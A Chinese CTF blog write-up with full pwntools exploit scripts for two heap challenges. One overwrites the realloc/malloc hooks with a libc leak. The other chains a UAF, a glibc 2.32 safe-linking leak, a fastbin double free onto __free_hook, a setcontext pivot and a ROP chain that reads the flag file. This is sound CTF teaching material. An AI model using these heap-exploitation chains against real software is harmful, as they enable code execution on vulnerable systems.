起床做了简单的pwn1,后面又放了题目,但是??突然好困,看了会没思路就去睡觉了(真滴摸鱼
记录一下做的题目和复现的记录吧
挺简单的,一开始能开个堆,会打印指针的值,也不限制大小,直接调用mmap开大堆,根据调试能得出libc基址
然后offset能任意地址写0x10的内容,直接打malloc_hook,realloc_hook修栈
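from pwn import *

# Challenge I/O: the remote instance is used by default; the local
# process line is kept (commented) for debugging under gdb.
# p = process('./fruitpie')
ip = '54f57bff-61b7-47cf-a0ff-f23c4dc7756a.machine.dasctf.com'
port = 50102
p = remote(ip, port)
elf = ELF('./fruitpie')
libc = elf.libc
context.log_level = 'debug'

# Step 1: ask for an oversized chunk so malloc services it via mmap.  The
# program prints the returned pointer, which sits at a fixed distance from
# the libc mapping; 0x989ff0 was measured by debugging this challenge's libc
# and is specific to it.
p.sendlineafter('malloc:', str(9999999))
p.recvuntil('0x')
leak = int(p.recvline()[:-1], 16)
info('leak:' + hex(leak))
libc_base = leak + 0x989ff0
info('libc_base:' + hex(libc_base))
# gdb.attach(p)

# Addresses in the leaked libc.  malloc_hook is computed for reference only;
# the 16-byte write below reaches it via the realloc_hook offset.
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
og = libc_base + 0x4f3c2  # code address jumped to from the hook (libc-specific offset)

# Step 2: the program permits a single 0x10-byte write at leak + offset.
# The offset targets __realloc_hook (per the author's note); __malloc_hook is
# the following qword, so one 16-byte write covers both.  __malloc_hook ->
# realloc+4 re-enters realloc with the stack adjusted, and realloc then
# dispatches to __realloc_hook -> og.
# NOTE: __malloc_hook/__realloc_hook were removed in glibc 2.34; this chain
# only applies to the older libc shipped with the challenge.
off = 'd75c18'  # off to realloc_hook
p.sendlineafter('Offset:', off)
# gdb.attach(p)
p.sendafter('Data:', p64(og) + p64(realloc + 4))
p.interactive()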
赛后复现的
2.32下的堆题,存在uaf,泄漏堆地址,libc都很容易,但是没有edit,很难绕过key指针,但是可以用fastbin。
在stash机制下,fastbin attack可以做到像tcache attack任意地址写,所以我们的思路就是先填满tcache,把libc和堆地址都泄漏了
并且在堆上布置好srop的数据和rop链,最后double free打free_hook触发srop,栈迁移到堆上执行rop。
不过要注意一点,在libc2.29之后,setcontext的参数变成了rdx,所以需要一个gadget去控制rdx的值
gadget
mov rdx, qword ptr [rdi + 8]
mov qword ptr [rsp], rax
call qword ptr [rdx + 0x20]
exp:
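from pwn import *

# Post-CTF reproduction runs against a local copy of the binary.
p = process('./clown')
elf = ELF('./clown')
libc = elf.libc
context.log_level = 'debug'
context.arch = 'amd64'  # p64/u64 and the SROP frame layout depend on this

# Short aliases for the tube API used throughout the exploit script.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
rl = lambda: p.recvline(keepends=False)
ss = lambda s: success(s)
dbg = lambda: gdb.attach(p)
irt = lambda: p.interactive()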
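def cmd(idx):
    """Select menu option *idx* at the challenge's ``>> `` prompt."""
    sla('>> ', str(idx))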
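def add(size, content):
    """Menu 1: allocate a chunk of *size* bytes and fill it with *content*.

    *content* is sent raw (no newline), so it must be bytes sized for the
    chunk; the challenge assigns the new chunk the next free index.
    """
    cmd(1)
    sla('Size:', str(size))
    sa('Content:', content)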
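def delete(idx):
    """Menu 2: free the chunk at *idx* (the pointer is not cleared — UAF)."""
    cmd(2)
    sla("Index:", str(idx))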
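def show(idx):
    """Menu 3: print the contents of the chunk at *idx* (works after free)."""
    cmd(3)
    sla("Index", str(idx))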
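def expliot():
    """Drive the reproduction described in the write-up above.

    Outline: leak the safe-linking key (and thus the heap base) through the
    UAF read, fill tcache so a freed chunk exposes a libc pointer, stage a
    setcontext frame plus a ROP chain on the heap, then use a fastbin double
    free to redirect __free_hook so that free() pivots the stack onto the
    heap.  All offsets are specific to the challenge binary and its glibc
    2.32; ``heap+0x...`` constants were taken from debugging.
    """
    # --- heap leak --------------------------------------------------------
    add(0x68, b'a')  # 0
    delete(0)
    show(0)
    # dbg()
    rl()
    # glibc 2.32 safe-linking: a lone tcache entry's next field is
    # (addr >> 12) ^ 0, i.e. the key alone, which encodes the heap base.
    key = u64(rl().ljust(8, b'\x00'))
    ss('key:' + hex(key))
    heap = key << 12
    ss('heap:' + hex(heap))

    # --- libc leak --------------------------------------------------------
    for i in range(0, 9):  # 1 - 9
        add(0x68, b'a')
    # for i in range(7,0,-1):
    #     delete(i)
    # index 8,9 used in fastbin double free
    # delete(8)
    for i in range(0, 8):  # 10 - 17
        add(0xd0, b'a')
    delete(10)
    for i in range(3, 9):
        delete(i + 9)
    delete(11)
    # One-byte partial overwrite of a stale pointer; show(18) then prints a
    # libc address (presumably an arena/bin link) from which the base is
    # recovered with the fixed -192-16 adjustment relative to __malloc_hook.
    add(0x68, b'\x60')
    show(18)
    libc_base = u64(ru('\x7f')[-6:].ljust(8, b'\x00')) - 192 - 16 - libc.sym['__malloc_hook']
    ss('libc:' + hex(libc_base))

    # Gadget and symbol addresses (offsets listed at the bottom of the file).
    pop_rdi = 0x00000000000277d6 + libc_base
    pop_rsi = 0x0000000000032032 + libc_base
    pop_rdx = 0x00000000000c800d + libc_base
    ret = 0x000000000002636f + libc_base
    gadget = 0x0000000000124990 + libc_base  # mov rdx,[rdi+8]; ...; call [rdx+0x20]
    open_addr = libc.sym['open'] + libc_base  # renamed: do not shadow builtin open()
    read = libc.sym['read'] + libc_base
    puts = libc.sym['puts'] + libc_base
    setcontext = libc.sym['setcontext'] + libc_base
    free_hook = libc.sym['__free_hook'] + libc_base

    # --- fastbin double free ---------------------------------------------
    # Fill the 0x70 tcache (7 entries) so the next frees go to the fastbin,
    # where the double free is not caught by the tcache key check.
    for i in range(7, 0, -1):
        delete(i)
    # index 8,9 used in fastbin double free
    delete(8)
    delete(9)
    delete(8)
    # Drain the tcache again so later 0x68 allocations come from the fastbin.
    for i in range(0, 7):
        add(0x68, b'a')

    # --- setcontext frame ------------------------------------------------
    # Offset 0x20 holds setcontext+53, which `gadget` reaches through
    # `call [rdx+0x20]` (rdx is loaded from the freed chunk, see add #26).
    # The rsp/rcx slots (per the author's annotations) pivot onto the ROP
    # chain and return into it.
    payload = b'a' * 0x20
    payload += p64(setcontext + 53) + b'a' * 8
    payload += b'a' * 0x70
    payload += p64(heap + 0xea0)  # rsp
    payload += p64(ret)  # rcx

    # --- ROP chain: open("flag") / read(3, buf, 0x40) / puts(buf) -------
    flag = heap + 0xf28  # address of the "flag\0" string appended below
    rop = p64(pop_rdi) + p64(flag)
    rop += p64(pop_rsi) + p64(0)
    rop += p64(pop_rdx) + p64(0)
    rop += p64(open_addr)
    rop += p64(pop_rdi) + p64(3)
    rop += p64(pop_rsi) + p64(heap + 0x100)
    rop += p64(pop_rdx) + p64(0x40)
    rop += p64(read)
    rop += p64(pop_rdi) + p64(heap + 0x100)
    rop += p64(puts)
    rop += b'flag\x00'

    # --- place everything on the heap and trigger ------------------------
    add(0x28, p64(0) + p64(heap + 0xd90))  # 0x7e0 26: [rdi+8] -> frame chunk
    add(0x100, payload)  # frame 27
    add(0x100, rop)  # rop ea0 28
    # Fastbin fd is safe-linked, so the target is stored as key ^ free_hook.
    add(0x68, p64(key ^ free_hook))
    add(0x68, b'a')
    add(0x68, b'a')
    add(0x68, p64(gadget))  # lands on __free_hook
    # dbg()
    delete(26)  # free(chunk 26) -> __free_hook -> gadget -> setcontext frame
    irt()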
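# Script entry point: the helpers above are only useful with a live tube.
if __name__ == '__main__':
    expliot()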
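# Gadget offsets (relative to libc base) referenced in expliot(), kept here
# as a bare string literal for reference.
'''
0x00000000000277d6 : pop rdi ; ret
0x0000000000032032 : pop rsi ; ret
0x00000000000c800d : pop rdx ; ret
0x0000000000124990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
0x000000000002636f : ret
'''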
原文地址:https://www.cnblogs.com/z2yh/p/14604195.html